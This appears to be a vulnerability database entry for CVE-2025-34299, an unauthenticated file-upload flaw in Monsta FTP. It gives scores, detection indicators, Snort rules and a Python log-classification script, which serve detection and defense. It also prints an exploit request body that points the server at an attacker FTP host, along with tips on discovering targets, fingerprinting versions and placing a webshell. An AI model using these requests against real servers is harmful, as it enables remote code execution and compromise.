cbcvebase.
CVE-2025-34299
published 2025-11-07


Priority: P192 · critical 9.8 (CVSS 3.1)
Vector: AV:N AC:L PR:N UI:N S:U C:H I:H A:H
Tags: ITW EXPLOIT · VulnCheck KEV · Initial access
Exploited in the wild
EPSS: 72.54% (99.4th percentile)
Monsta FTP versions 2.11 and earlier contain a vulnerability that allows unauthenticated arbitrary file uploads. This flaw enables attackers to execute arbitrary code by uploading a specially crafted file from a malicious (S)FTP server.

Affected (2 ranges)

Vendor                        | Product    | Version range | Fixed in
monsta_limited_of_new_zealand | monsta_ftp | <= 2.11       |
monstaftp                     | monsta_ftp | <= 2.11       |

Detection & IOCs (extracted from sources)

url: /mftp/application/api/api.php
path: /mftp/application/api/api.php
path: /application/api/api.php
command: request={"connectionType":"ftp","configuration":{"host":"<attacker>","username":"nuclei-oast","initialDirectory":"/","password":"test","port":21},"actionName":"downloadFile","context":{"remotePath":"/test.txt","localPath":"/tmp/nuclei-oast-test.txt"}}
other: actionName: downloadFile
snort: alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS Monsta FTP Arbitrary File Upload Attempt (CVE-2025-34299)"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/mftp/application/api/api.php"; http.request_body; content:"|22|actionName|22 3a 22|downloadFile|22|"; fast_pattern; content:"|22|remotePath|22 3a 22 2f|"; content:"|22|localpath|22 3a 22 2f|"; reference:url,labs.watchtowr.com/whats-that-coming-over-the-hill-monsta-ftp-remote-code-execution-cve-2025-34299/; reference:cve,2025-32499; reference:cve,2025-34299; classtype:attempted-admin; sid:2065695; rev:1; metadata:affected_product Monsta_FTP, attack_target Networking_Equipment, tls_state plaintext, created_at 2025_11_07, cve CVE_2025_34299, deployment Perimeter, deployment Internal, performance_impact Low, confidence High, signature_severity Major, tag Exploit, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2025_11_07, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application; target:dest_ip;)
snort: alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS Monsta FTP Server Side Request Forgery Attempt (CVE-2022-31827)"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/application/api/api.php"; http.request_body; content:"|22|actionName|22 3a 22|fetchRemoteFile|22|"; fast_pattern; content:"|22|source|22 3a 22|http|3a 2f 2f|"; reference:url,labs.watchtowr.com/whats-that-coming-over-the-hill-monsta-ftp-remote-code-execution-cve-2025-34299/; reference:cve,2022-31827; classtype:web-application-attack; sid:2065694; rev:1;)
bytes: |22|actionName|22 3a 22|downloadFile|22|
bytes: |22|remotePath|22 3a 22 2f|
bytes: |22|localpath|22 3a 22 2f|
  • Exploit traffic targets POST /mftp/application/api/api.php with a JSON body containing actionName=downloadFile, remotePath, and localPath fields — all unauthenticated.
  • The attacker supplies an attacker-controlled FTP/SFTP host in the 'host' field of the JSON configuration, causing the server to connect outbound to the malicious server and download a file to an arbitrary localPath.
  • Detect Monsta FTP instances via Shodan/FOFA using the page title 'Monsta FTP' for asset discovery before exploitation.
  • Version fingerprinting: extract version from the JS filename pattern monsta-min-<version>.js in the page body; versions <= 2.11.2 are vulnerable.
  • OOB/OAST detection: the exploit causes an outbound DNS/FTP connection from the victim server to the attacker's host; monitor for unexpected outbound FTP (port 21) connections from web server processes.
  • The localPath parameter in the downloadFile request can be set to web-accessible directories, enabling webshell placement; monitor for new PHP/script files created in web root after POST requests to api.php.
  • The Nuclei template targets both /mftp/ and / as base paths with stop-at-first-match, meaning the api.php endpoint may be at /mftp/application/api/api.php or /application/api/api.php depending on installation.
  • The Metasploit module uses FTP (not SFTP) to exploit the vulnerability, though the vulnerability also supports SFTP as the connectionType.
  • The ET Snort rule for CVE-2025-34299 (sid:2065695) references both CVE-2025-32499 and CVE-2025-34299, suggesting overlap or related CVEs for the same endpoint.
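An added detection check (not from the page's sources) over request records as a proxy or WAF might log them, with the record field names and sample records constructed here: it flags POSTs to either api.php base path whose JSON carries actionName downloadFile, extracts the attacker-controlled host and localPath for triage, and marks a script extension on localPath as the webshell-placement case. Keys are matched case-insensitively because the Snort rule above matches the literal bytes `"localpath"` while the captured request spells the key `localPath`, and a Snort content match without `nocase` is case-sensitive, so a rule copied as written may miss that request.

```python
import json
from urllib.parse import parse_qs

# Endpoint paths named on the page; either base path may exist depending on installation.
API_PATHS = ("/mftp/application/api/api.php", "/application/api/api.php")
SCRIPT_EXTS = (".php", ".phtml", ".phar")

def _get_ci(obj, key):
    # Case-insensitive key lookup: the Snort rule spells 'localpath', the captured request 'localPath'.
    if not isinstance(obj, dict):
        return None
    return next((v for k, v in obj.items() if k.lower() == key.lower()), None)

def _parse_body(body):
    # Accept a bare JSON body or the form-encoded 'request=<json>' shape shown on the page.
    if body.startswith("request="):
        body = parse_qs(body, keep_blank_values=True).get("request", [""])[0]
    try:
        return json.loads(body)
    except ValueError:
        return None

def classify(record):
    """Return a finding dict for a request matching the downloadFile pattern, else None."""
    if record.get("method", "").upper() != "POST" or record.get("uri") not in API_PATHS:
        return None
    req = _parse_body(record.get("body", ""))
    if req is None or _get_ci(req, "actionName") != "downloadFile":
        return None
    cfg = _get_ci(req, "configuration") or {}
    ctx = _get_ci(req, "context") or {}
    local_path = _get_ci(ctx, "localPath") or ""
    return {
        "uri": record["uri"],
        "connection_type": _get_ci(req, "connectionType"),  # ftp or sftp
        "remote_host": _get_ci(cfg, "host"),                # host the victim server dials out to
        "remote_path": _get_ci(ctx, "remotePath"),
        "local_path": local_path,
        # A script extension on the download target is the webshell-placement case the page describes.
        "webshell_risk": local_path.lower().endswith(SCRIPT_EXTS),
    }

# Constructed sample records (not real traffic): one exploit attempt, one benign call, one unrelated hit.
SAMPLE_LOGS = [
    {"method": "POST", "uri": "/mftp/application/api/api.php",
     "body": 'request={"connectionType":"ftp","configuration":{"host":"203.0.113.5","port":21},'
             '"actionName":"downloadFile","context":{"remotePath":"/t.txt","localPath":"/var/www/html/up.php"}}'},
    {"method": "POST", "uri": "/application/api/api.php", "body": '{"connectionType":"sftp","actionName":"listDirectory","context":{"path":"/"}}'},
    {"method": "GET", "uri": "/mftp/index.php", "body": ""},
]
```

Feeding a day's api.php POSTs through `classify` and then correlating any `remote_host` with outbound port 21/22 connections from the web server process gives the OOB corroboration the bullets above describe.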

CVSS provenance

Source    | Version | Score        | Vector
nvd       | v3.1    | 9.8 CRITICAL | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvd       | v4.0    | 9.3 CRITICAL | CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
vulncheck |         | 9.3 CRITICAL |